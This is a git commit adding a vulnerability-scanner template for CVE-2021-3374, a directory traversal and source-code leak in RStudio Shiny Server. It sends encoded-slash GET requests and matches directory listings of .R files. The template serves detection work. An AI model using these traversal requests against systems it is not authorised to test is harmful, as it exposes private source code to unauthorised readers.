Create CVE-2021-3374.yaml

2021-04-14 20:56:03 +00:00 · 2021-04-14 20:56:03 +00:00 · de7321344f
parent 5aa52a1760
commit de7321344f
1 changed files with 28 additions and 0 deletions
--- a/cves/2021/CVE-2021-3374.yaml
+++ b/cves/2021/CVE-2021-3374.yaml
@ -0,0 +1,28 @@
+id: CVE-2021-3374
+
+info:
+  name: Rstudio Shiny Server Directory Traversal
+  author: geeknik
+  description: Rstudio Shiny-Server prior to 1.5.16 is vulnerable to directory traversal and source code leakage. This can be exploited by appending an encoded slash to the>
+  reference: https://github.com/colemanjp/rstudio-shiny-server-directory-traversal-source-code-leak
+  severity: medium
+  tags: cve,cve2021,rstudio,traversal
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/%2f/"
+      - "{{BaseURL}}/sample-apps/hello/%2f/"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "Index of /"
+      - type: regex
+        part: body
+        regex:
+          - "[A-Za-z].*\\.R"